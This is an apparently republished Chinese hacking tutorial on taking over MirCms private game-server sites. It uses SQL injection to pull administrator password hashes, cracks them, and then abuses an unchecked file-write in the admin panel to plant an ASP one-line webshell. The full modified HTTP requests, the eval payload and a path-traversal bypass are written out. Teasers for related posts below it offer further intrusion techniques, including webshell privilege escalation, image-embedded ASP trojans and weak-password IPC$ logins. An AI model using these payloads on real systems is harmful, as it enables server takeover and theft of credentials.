进一步取得MirCms传奇私服的WebShell

在黑防的2005年第6期中,小狮子写了关于MirCms中投票子系统的漏洞,阅读以后觉得该系统既然存在像登录验证错误这样的漏洞就应该还存在其他的可以更进一步利用的漏洞。本文就利用该系统中的这些漏洞取得其WebShell。

一、取得管理员账号和密码。

网站根目录下的yns_tupdata.asp中存在SQL注入漏洞,我们利用其可以获取管理员的账号和密码,看下面的代码片断。

If (Request.QueryString("t_id") <> "") Then

rst__MMColParam = Request.QueryString("t_id")

End If

……

rst.Source = "SELECT * FROM t_type WHERE t_id = " + Replace(rst__MMColParam, "'", "''") + ""

变量t_id仅过滤了单引号就送到了SQL语句中,这样我们就可以使用 1 or 1=1的形式进行注入,打开NBSI输入注入地址http://xxx/yns_tupdata.asp?t_id=1 or 1=1,由于在网上就可以down到该系统的源代码,也就省去了我们猜表名和列名的过程,猜解以后我们就可以得到一些管理员的用户名和密码。

由于密码是MD5加密的,而且后台还是Session验证,所以我们只能老老实实的去破解它的原始密码,至于破解MD5我们可以挂个常用密码的字典跑一遍,然后就看你的运气喽^_^这里我就得到了一个账号<如果云知道>的密码49ba59abbe56e057=〉123456,OK!就用这账号登录后台。(注:我们只需要得到level为1的账号就够用了,而且一般这种等级的账号密码比较简单^_^)

二、进一步取得WebShell

还是让我们先看一下yns_nadd_save.asp中的代码片断

mm_path = server.MapPath((rst.Fields.Item("t_dir").Value)&"/"&(rsts.Fields.Item("ts_dir").Value)&"/"

&request.Form("n_fpath")&"/"&request.Form("n_fname"))

Set fout = fso.CreateTextFile(mm_path)

fout.WriteLine pencat

fout.close

程序从表单中取得n_fname后没有进行任何的扩展名检查就合成了mm_path变量,然后利用fso函数生成了以n_fname为文件名的文件,这样只要我们修改n_fname的值为 xxx.asp就可以很简单的在服务器上生成一个ASP木马,然后我们再看看这个文件的内容是怎么生成的,

N_Title=Request.Form("n_title")

mm_template_path = server.MapPath("templates/type_template/type_son_template/detail_template.htm")

set fso_line = fso.opentextfile(mm_template_path,1,True)

pencat=fso_line.readall

end if

pencat=replace(pencat,"t_title",n_title)

从上面我们可以知道程序是将detail_template.htm中的内容读入,然后替换相关变量,最后得到生成文件的内容,这里我们就利用t_title这个替换变量来写入我们的ASP木马代码。我们来试一下,打开WinSock Expert在后台填加一篇文章,抓包内容如下:

POST /yns_nadd_save.asp HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/

vnd.ms-powerpoint, application/msword, */*

Referer: http://xxx/MirCMS_Add.asp

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322)

Host:xxx.net

Content-Length:199

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDSCQTAQQB=JLOPEBEBAFPEBBJAJCGHKBCF

n_tid=52&n_tsid=56&n_sid=&n_title=test&n_author=%C8%E7%B9%FB%D4%C6%D6%AA%B5%C0&n_mpic=&n_rpic=&n_fname=20053151744366646.htm&n_fpath=2005-6-6&n_date=2005-6-6+6%3A50%3A22&n_content=ttt&MM_insert=form1

这里我们将n_fname的值改成1.asp,然后将n_title的值改成我们常用的一句话木马,注意写入的ASP代码需要使用unicode编码以后的形式。<SCRIPT%20RUNAT=SERVER%20LANGUAGE=

JAVASCRIPT>eval(Request.form('#')%2B'')</SCRIPT>,最后不要忘了重新计算封包的大小更改Content-Length的值,这部分知识在研究动网上传漏洞的时候想必大家都已经研究明白了吧,下面就直接给出我的修改结果。

POST /yns_nadd_save.asp HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/

vnd.ms-powerpoint, application/msword, */*

Referer: http://xxx/MirCMS_Add.asp

Accept-Language: zh-cn

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322)

Host:xxx.net

Content-Length: 261

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: ASPSESSIONIDSCQTAQQB=JLOPEBEBAFPEBBJAJCGHKBCF

n_tid=52&n_tsid=56&n_sid=&n_title=<SCRIPT%20RUNAT=SERVER%20LANGUAGE=JAVASCRIPT>eval(Request.form('#')%2B'')</SCRIPT>&n_author=%C8%E7%B9%FB%D4%C6%D6%AA%B5%C0&n_mpic=&n_rpic=&n_fname=1.asp&n_fpath=2005-6-6&n_date=2005-6-6+6%3A50%3A22&n_content=ttt&MM_insert=form1

最后使用NC提交我们修改后的封包,到MirCMS_Html/xxx/年-月-日/下就可以找到我们的木马了,当然如果网站的管理员比较BT的话可能会设置MirCMS_Html目录下无法运行ASP文件,不过没有关系,我们只需把n_fname的值改成../../1.asp切换到根目录下就可以了,有了WebShell剩下的事情大家就可以看着办喽^_^

(0)

相关推荐

  • 进一步取得MirCms传奇私服的WebShell

    在黑防的2005年第6期中,小狮子写了关于MirCms中投票子系统的漏洞,阅读以后觉得该系统既然存在像登录验证错误这样的漏洞就应该还存在其他的可以更进一步利用的漏洞.本文就利用该系统中的这些漏洞取得其WebShell. 一.取得管理员账号和密码. 网站根目录下的yns_tupdata.asp中存在SQL注入漏洞,我们利用其可以获取管理员的账号和密码,看下面的代码片断. If (Request.QueryString("t_id") <> "") Then

  • 制作传奇私服技术系列之一架设技术

    想创建自己的私服----新人必学 1.修改游戏初始设置 进入C:\mirsever\Mir200 打开 !setup.txt 找到: TestLevel=35 (大家可以改成50级\ 我设的35级) TestGold=200000 (20W传奇币 不少了吧) TestServerUserLimit=10 (用户连接数,我的机子慢,设小点.) 2.修改**权限 进入 C:\mirserver\Mir200\Envir 打开adminlist.txt把你的名字写入adminlist这个文件里面 就有

  • 传奇私服人物死亡自动复活回城的修改

    0XC6DF9:E9026D04000XBB4A3:E9C82605000X108B00:8B45FC80B83A02000000741666837846007405E9F692FBFFE88F8BEFFFE9DC92FBFFE8858BEFFF8B55FC2B82080300003D307500000F86DB92FBFF8B45FC66C780A40100000100C68004030000008B45FCE8068DF9FF8B45FCE8C662FBFF8B45FCBA03000000E

  • 传奇私服仓库密码系统UE改法

    以下的开始的数字是UE打开M2后最下面中间的位置. 这里不做汇编讲解,以下是从具体的地址开始替换后的结果. 以下除神州M2外其他任何原始未加密delphi版的M2修改后都可以成功实现仓库密码. 用过renshouren工具的应该知道前面的那个数字是什么意思的 856668 后门指令接收部分(即原来的后门部分)6A006A004975F9538955F88945FC8B45F8E80E22F3FF33C0556889534D0 064FF30648920837DF8000F842B3400008B

  • 传奇私服配合仓库密码系统

    首先用工具UE修改存取的命令为 存 storage 修改为 mhwlcun ←这里可以随便你自己改,但不能超过7个取 getback 修改为 mhwlqwp ←这里可以随便你自己改,但不能超过7个注意:改了上面的命令后,你的脚本也要改!!! 按上面的修改好后,在你的脚本里加入下面的脚本[@storage]#ACTgoto @yongwaigua [@getback]#ACTgoto @yongwaigua [@yongwaigua]#ACTtake 回城卷 100take 回城卷包 100tak

  • 游戏私服安全攻防技巧全攻略之攻击篇

    前几天,本私服也同样遭受过黑客的攻击!但是研究了几次发现了漏洞的所在! 下面我先写如何入侵计算机的,我用的是WINDOWS 2000 SEVER 1 X-SCAN扫描IP 看看谁是弱口令(IP也非常容易得到,私服都有,弱口令就是用户名和密码都是系统默认的,没有改.) 2 打开DOS系统 在DOS下进行*作! c:/>net use \\192.168.0.1\ipc$ /user:administrator 进入对方计算机USER进入的就是管理员用户. 进入了以后就好办了,可以找你要黑的私服!做

  • 让你变成ASP木马高手

    1.名称:如何制作图片ASP木马 (可显示图片)  建一个asp文件,内容为<!--#i nclude file="ating.jpg"-->  找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为  了运行成功,还要搜索<%和%>,将其变为00,(不要替换自己asp的),再把jpg文件开头加入  <SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(

  • 传奇完全私服修改方案

    (1).DBC的注释---部分内容我只能注释部分的~我没注释的就是我不了解的~有人知道的话回我下~谢谢~~在DBC里打开DB文件后由个目录~第一个是书籍的~第二个是怪物的~第三个是物品的~书籍SID   物品代号NAME  物品名称Effect Type 效果属性Effect  效果(放此摸法所产生的动画效果)Spell  一段持续时间(摸法效果的持续时间)Power  基本威力MaxPower  最大威力DefSpellDefPowerDefMaxPowerJob  使用职业 (0-战士,1-

  • 超全的webshell权限提升方法

    WEBSHELL权限提升技巧  c: d: e:.....  C:\Documents and Settings\All Users\「开始」菜单\程序\  看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,  C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\  看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆  c:\Pr

  • webshell权限提升技巧

    WEBSHELL权限提升技巧 c: d: e:.....  C:\Documents and Settings\All Users\「开始」菜单\程序\  看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,  C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\  看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆  c:\Pro

随机推荐